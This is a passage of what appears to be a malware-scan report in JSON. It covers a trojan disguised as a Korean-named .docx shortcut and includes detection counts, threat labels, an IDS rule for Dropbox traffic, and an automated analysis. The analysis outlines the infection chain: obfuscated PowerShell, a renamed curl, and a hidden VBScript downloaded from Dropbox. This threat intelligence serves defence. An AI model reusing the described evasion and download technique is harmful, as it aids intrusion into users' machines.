},
"last_analysis_stats": {
"malicious": 33,
"suspicious": 0,
"undetected": 23,
"harmless": 0,
"timeout": 5,
"confirmed-timeout": 0,
"failure": 2,
"type-unsupported": 12
},
"first_seen_itw_date": 1773830623,
"last_analysis_date": 1780648232,
"times_submitted": 1,
"names": [
"\uc911\uad6d CMG \uc778\ud130\ubdf0.docx.lnk",
"\u2534\u2580\u2592\u2563 CMG \u2514\u256c\u253c\u2550\u2551\u03a3.docx.lnk",
"?? CMG ???.docx.lnk"
],
"type_extension": "lnk",
"popular_threat_classification": {
"popular_threat_category": [
{
"value": "trojan",
"count": 19
},
{
"value": "downloader",
"count": 1
}
],
"suggested_threat_label": "trojan.pantera/powecod",
"popular_threat_name": [
{
"value": "pantera",
"count": 8
},
{
"value": "powecod",
"count": 3
},
{
"value": "lnkexec",
"count": 2
}
]
},
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 5,
"medium": 8,
"low": 3
}
},
"crowdsourced_ids_results": [
{
"rule_category": "Potential Corporate Privacy Violation",
"alert_severity": "info",
"rule_msg": "ET POLICY Dropbox.com Offsite File Backup in Use",
"rule_id": "1:2012647",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert tls [108.160.162.0/20,162.125.0.0/16,192.189.200.0/23,199.47.216.0/22,205.189.0.0/24,209.99.70.0/24,45.58.64.0/20] 443 -> $HOME_NET any (msg:\"ET POLICY Dropbox.com Offsite File Backup in Use\"; flow:established,to_client; tls.cert_subject; content:\"CN=*.dropbox.com\"; fast_pattern; threshold: type limit, count 1, seconds 300, track by_src; reference:url,www.dropbox.com; reference:url,dereknewton.com/2011/04/dropbox-authentication-static-host-ids/; classtype:policy-violation; sid:2012647; rev:7; metadata:created_at 2011_04_07, confidence High, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_03_25;)",
"rule_references": [
"https://www.dropbox.com",
"https://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
],
"alert_context": [
{
"src_ip": "162.125.3.18",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"b44baa8a20901c5663b3a9664ba8a767"
]
},
{
"src_ip": "162.125.70.18",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"b44baa8a20901c5663b3a9664ba8a767"
]
}
]
}
],
"filecondis": {
"dhash": "7074785040200040",
"raw_md5": "15f88d9723a8a417c55ef9d41507ef9f"
},
"tags": [
"lnk",
"long-sleeps",
"long-command-line-arguments",
"executes-dropped-file",
"hiding-window",
"high-entropy",
"self-delete",
"detect-debug-environment",
"large-file",
"url-pattern",
"abused-exe-pattern"
],
"last_modification_date": 1781278124,
"vhash": "9aa7b1b48e30aaaec993e88b4f95def7",
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"crowdsourced_ai_results": [
{
"category": "code_insight",
"source": "palm",
"verdict": "malicious",
"analysis": "The LNK file executes a complex, multi-stage attack chain using `cmd.exe`. The execution chain begins by using `cmd.exe` to find and execute PowerShell (`*rshell.exe`) with a heavily obfuscated payload. This payload uses a character-shifting algorithm (key=3) followed by Base64 decoding (`FromBase64String`) to reveal a secondary script block, characteristic of evasive techniques. Following the PowerShell execution, the command shell uses LOLBins: it copies `curl.exe` to a temporary name (`TMP0392.exe`) in the `%appdata%\\Microsoft\\MMC` directory. It then uses this temporary curl binary to download a file named `setting.ini` from a public Dropbox URL, saves it as `taskschd.vbs`, hides the downloaded file (`attrib +h`), and finally executes the VBScript file. The entire process involves encoded code execution, defense evasion (using LOLBins and file hiding), and downloading an external payload from a remote URL (Dropbox), leaving no doubt about its malicious intent.",
"id": "e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73-file-palm"
}
]
}
}
}